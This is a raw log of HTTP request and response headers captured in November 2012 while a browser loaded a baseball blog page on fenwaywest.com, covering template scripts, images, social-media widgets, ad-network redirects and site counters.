Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Tue, 13 Nov 2012 22:05:37 GMT
Etag: &quot;791418-973f-4ce679e24ae40&quot;
Accept-Ranges: bytes
Content-Length: 38719
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /templates/yoo_bigeasy/warp/js/warp.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:25:40 GMT
Etag: &quot;ecb56a-1a52-4c3876dfad900&quot;
Accept-Ranges: bytes
Content-Length: 6738
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /templates/yoo_bigeasy/warp/js/accordionmenu.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:25:30 GMT
Etag: &quot;ecb569-58b-4c3876d624280&quot;
Accept-Ranges: bytes
Content-Length: 1419
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /templates/yoo_bigeasy/warp/js/dropdownmenu.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:25:32 GMT
Etag: &quot;ecb56b-14b1-4c3876d80c700&quot;
Accept-Ranges: bytes
Content-Length: 5297
Keep-Alive: timeout=5, max=496
Connection: Keep-Alive
GET /templates/yoo_bigeasy/js/template.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:21:52 GMT
Etag: &quot;ecb55d-373-4c3876063d800&quot;
Accept-Ranges: bytes
Content-Length: 883
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /navigation/js/menu.php HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=520266&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=66900 HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/getjs.aspx?action=VIEWAD&amp;cwrun=200&amp;cwadformat=728X90&amp;cwpid=520266&amp;cwwidth=728&amp;cwheight=90&amp;cwpnet=1&amp;cwtagid=66900 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=CT; cw=cw
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: http://ak1.abmr.net/is/tag.contextweb.com?U=/TagPublish/getjs.aspx&amp;V=3-SQYsGvnZmcxs3KjwJGvsoig6AVpJSRTMOOjuf%2f425eFNSXUj4yGU%2fidNBY9KSBFe&amp;I=6A2D91A46D43ACC&amp;D=contextweb.com&amp;01AD=1&amp;action=VIEWAD&amp;cwrun=200&amp;cwadformat=728X90&amp;cwpid=520266&amp;cwwidth=728&amp;cwheight=90&amp;cwpnet=1&amp;cwtagid=66900
Date: Sun, 18 Nov 2012 01:30:35 GMT
Connection: keep-alive
Set-Cookie: C2W4=CT-1; expires=Sun, 16-Dec-2012 01:30:35 GMT; path=/; domain=.contextweb.com
GET /is/tag.contextweb.com?U=/TagPublish/getjs.aspx&V=3-SQYsGvnZmcxs3KjwJGvsoig6AVpJSRTMOOjuf%2f425eFNSXUj4yGU%2fidNBY9KSBFe&I=6A2D91A46D43ACC&D=contextweb.com&01AD=1&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=520266&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=66900 HTTP/1.1

Host: ak1.abmr.net
GET /is/tag.contextweb.com?U=/TagPublish/getjs.aspx&amp;V=3-SQYsGvnZmcxs3KjwJGvsoig6AVpJSRTMOOjuf%2f425eFNSXUj4yGU%2fidNBY9KSBFe&amp;I=6A2D91A46D43ACC&amp;D=contextweb.com&amp;01AD=1&amp;action=VIEWAD&amp;cwrun=200&amp;cwadformat=728X90&amp;cwpid=520266&amp;cwwidth=728&amp;cwheight=90&amp;cwpnet=1&amp;cwtagid=66900 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.contextweb.com/TagPublish/getjs.aspx?01AD=3qUE0LMwcKDqHRNhBNHv0tfDYCqt2suH9bbQXkecqd-cVAGhSLg-Ugg&amp;01RI=6A2D91A46D43ACC&amp;01NA=na&amp;action=VIEWAD&amp;cwrun=200&amp;cwadformat=728X90&amp;cwpid=520266&amp;cwwidth=728&amp;cwheight=90&amp;cwpnet=1&amp;cwtagid=66900
Expires: Sun, 18 Nov 2012 01:30:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 18 Nov 2012 01:30:35 GMT
Connection: keep-alive
Set-Cookie: 01AI=2-2-AD16F36B0852D6731F71B66C9E99A74320FC050BD9D65639E78B8E53FCD3065D-31B15099DE8AFA1D2CEAF2ABF17328DDABF99BFA32659F9934AE7886A0C24022; expires=Mon, 18-Nov-2013 01:30:35 GMT; path=/; domain=.abmr.net
P3P: policyref=&quot;http://www.abmr.net/w3c/policy.xml&quot;, CP=&quot;NON DSP COR CURa ADMa DEVa OUR SAMa IND&quot;
GET /images/ybn/badge_100.gif HTTP/1.1

Host: www.yardbarker.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx/0.8.34
Content-Length: 3283
Last-Modified: Tue, 21 Aug 2012 18:49:43 GMT
Accept-Ranges: bytes
X-N: S
Date: Sun, 18 Nov 2012 01:30:35 GMT
Connection: keep-alive
GET /templates/yoo_bigeasy/warp/js/search.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:25:38 GMT
Etag: &quot;ecb568-f81-4c3876ddc5480&quot;
Accept-Ranges: bytes
Content-Length: 3969
Keep-Alive: timeout=5, max=495
Connection: Keep-Alive
GET /widgets.js HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
Cache-Control: public, max-age=1800
Last-Modified: Thu, 08 Nov 2012 09:18:39 GMT
Etag: &quot;a888ca6754ffdd1c338f0ee6f07cf733&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 24583
Date: Sun, 18 Nov 2012 01:30:35 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /en_US/all.js HTTP/1.1

Host: connect.facebook.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Etag: &quot;9df4c6ffe9f56aa2e95aaa6beb47d5f6&quot;
Content-Encoding: gzip
X-FB-Debug: 3cXquxO8YykPOPZKUKOjcOWG0hVXC58PrCNjpJcExiA=
Content-Length: 58011
Cache-Control: public, max-age=216
Expires: Sun, 18 Nov 2012 01:34:11 GMT
Date: Sun, 18 Nov 2012 01:30:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /adserver/rsiads.js HTTP/1.1

Host: ads.revsci.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/javascript
Server: Apache-Coyote/1.1
Cache-Control: max-age=86400
Expires: Mon, 19 Nov 2012 01:30:08 GMT
Etag: W/&quot;790-1348719630000&quot;
Last-Modified: Thu, 27 Sep 2012 04:20:30 GMT
Transfer-Encoding: chunked
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Sun, 18 Nov 2012 01:30:08 GMT
GET /js/plusone.js HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Etag: &quot;9f40ccce00af865ceb2b70072dc6cf44&quot;
Expires: Sun, 18 Nov 2012 01:30:35 GMT
Date: Sun, 18 Nov 2012 01:30:35 GMT
Cache-Control: private, max-age=1800
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /components/com_obrss/images/buttons/rss_2.0.gif HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Mon, 21 May 2012 00:03:32 GMT
Etag: &quot;eccc09-db-4c080a1ef3d00&quot;
Accept-Ranges: bytes
Content-Length: 219
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /images/stories/facebook_64.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sun, 05 Aug 2012 22:47:02 GMT
Etag: &quot;ecd18a-613-4c68c8a214580&quot;
Accept-Ranges: bytes
Content-Length: 1555
Keep-Alive: timeout=5, max=495
Connection: Keep-Alive
GET /images/stories/Twitter_64.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sun, 05 Aug 2012 22:47:02 GMT
Etag: &quot;ecd189-675-4c68c8a214580&quot;
Accept-Ranges: bytes
Content-Length: 1653
Keep-Alive: timeout=5, max=496
Connection: Keep-Alive
GET /images/stories/app-iphone-android.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sun, 05 Aug 2012 22:47:02 GMT
Etag: &quot;ecd187-d76-4c68c8a214580&quot;
Accept-Ranges: bytes
Content-Length: 3446
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /curation/maintop/thumbimages/arod%20giambi2.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Wed, 14 Nov 2012 21:36:02 GMT
Etag: &quot;80527d-58b3-4ce7b522fb480&quot;
Accept-Ranges: bytes
Content-Length: 22707
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /images/stories/youtube_64.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Tue, 13 Nov 2012 01:57:15 GMT
Etag: &quot;17dfbbc-25b9-4ce56bcaff4c0&quot;
Accept-Ranges: bytes
Content-Length: 9657
Keep-Alive: timeout=5, max=494
Connection: Keep-Alive
OPTIONS /media/widgetkit/widgets/spotlight/js/spotlight.js?_=1353202235086 HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Origin: http://fenwaywest.com
Access-Control-Request-Method: GET
Access-Control-Request-Headers: x-requested-with
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
OPTIONS /media/widgetkit/widgets/mediaplayer/mediaelement/mediaelement-and-player.js?_=1353202235084 HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Origin: http://fenwaywest.com
Access-Control-Request-Method: GET
Access-Control-Request-Headers: x-requested-with
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
OPTIONS /media/widgetkit/widgets/lightbox/js/lightbox.js?_=1353202235081 HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Origin: http://fenwaywest.com
Access-Control-Request-Method: GET
Access-Control-Request-Headers: x-requested-with
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /images/stories/rss_64.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sun, 05 Aug 2012 22:47:02 GMT
Etag: &quot;ecd184-88e-4c68c8a214580&quot;
Accept-Ranges: bytes
Content-Length: 2190
Keep-Alive: timeout=5, max=496
Connection: Keep-Alive
GET /curation/maintop/thumbimages/aaron-craft.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 15 Nov 2012 11:21:52 GMT
Etag: &quot;80527e-829d-4ce86db98b400&quot;
Accept-Ranges: bytes
Content-Length: 33437
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /templates/yoo_bigeasy/images/logo.jpg HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sat, 10 Nov 2012 19:42:19 GMT
Etag: &quot;eccb37-d70d-4ce2944237cc0&quot;
Accept-Ranges: bytes
Content-Length: 55053
Keep-Alive: timeout=5, max=495
Connection: Keep-Alive
GET /js/counter.js?site=s27fenwaywest HTTP/1.1

Host: s27.sitemeter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Redirect

Content-Type: text/html
Content-Length: 181
Location: http://s27.sitemeter.com/js/counter.asp?site=s27fenwaywest
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 18 Nov 2012 01:30:23 GMT
GET /js/counter.js?site=s52bloguinbaseball HTTP/1.1

Host: s21.sitemeter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Redirect

Content-Type: text/html
Content-Length: 186
Location: http://s21.sitemeter.com/js/counter.asp?site=s52bloguinbaseball
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 18 Nov 2012 01:30:23 GMT
GET /curation/maintop/thumbimages/hockey%20suits.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sat, 17 Nov 2012 20:17:45 GMT
Etag: &quot;80528d-122eb-4ceb693bf4c40&quot;
Accept-Ranges: bytes
Content-Length: 74475
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /TagPublish/getjs.aspx?01AD=3qUE0LMwcKDqHRNhBNHv0tfDYCqt2suH9bbQXkecqd-cVAGhSLg-Ugg&01RI=6A2D91A46D43ACC&01NA=na&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=520266&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=66900 HTTP/1.1

Host: tag.contextweb.com
